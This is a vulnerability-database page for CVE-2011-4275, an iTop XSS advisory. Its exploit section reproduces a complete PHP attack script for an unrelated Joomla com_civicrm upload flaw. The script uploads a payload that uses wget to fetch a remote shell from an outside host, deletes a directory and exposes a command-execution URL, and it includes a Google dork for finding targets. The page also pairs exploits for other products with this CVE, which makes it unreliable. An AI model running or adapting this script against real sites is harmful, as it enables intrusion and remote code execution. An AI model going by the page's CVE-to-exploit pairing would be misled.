CVE-2011-4275

medium

Published 2011-11-26 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24969 webapps php verified text · 2 KB

iskorpitx · 2013-04-22

Joomla! Component com_civicrm 4.2.2 - Remote Code Injection

text exploit Source: Exploit-DB

# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64 
# CVE : http://www.securityweb.org

<?php 
  
# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
  
   
  
$options = getopt('u:f:'); 
  
if(!isset($options['u'], $options['f'])) 
die("\n        Usage example: php jnews.php -u http://target.com/ -f post.php\n 
-u http://target.com/    The full path to Joomla! 
-f post.php             The name of the file to create.\n");  
  
$url     =  $options['u']; 
$file    =  $options['f']; 


$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}"; 
$url   = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}"; 

  
$data      = '<?php 
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ; 
 fclose ( $handle ); 
 ?>'; 
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
'Content-Type: text/plain'); 
  
  
echo "        [+] Submitting request to: {$options['u']}\n"; 
  
  
$handle = curl_init(); 
  
curl_setopt($handle, CURLOPT_URL, $url); 
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); 
curl_setopt($handle, CURLOPT_POSTFIELDS, $data); 
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); 
  
$source = curl_exec($handle); 
curl_close($handle); 
  
  
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) 
{ 
echo "        [+] Exploit completed successfully!\n"; 
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n"; 
} 
else
{ 
die("        [+] Exploit was unsuccessful.\n"); 
} 
   
?>

EDB-24492 webapps php verified

LiquidWorm · 2013-02-13

OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload